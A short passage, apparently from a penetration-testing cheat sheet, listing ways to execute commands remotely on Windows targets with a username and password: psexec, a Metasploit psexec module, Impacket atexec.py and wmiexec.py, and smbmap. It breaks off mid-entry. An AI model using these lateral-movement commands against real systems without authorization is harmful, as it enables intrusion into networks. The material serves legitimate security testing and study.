-
With username/password With psexec (Prerequisites: ADMIN$ share is available, the user is part of the local administrator group on the target) With psexec via Metasploit use exploit/windows/smb/psexec With atexec (Impacket) atexec.py dom/user:pass@$target cmd.exe With wmiexec wmiexec.py domain.local/$target:$password@$ip With Smbmap smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target With Wmic (To run a…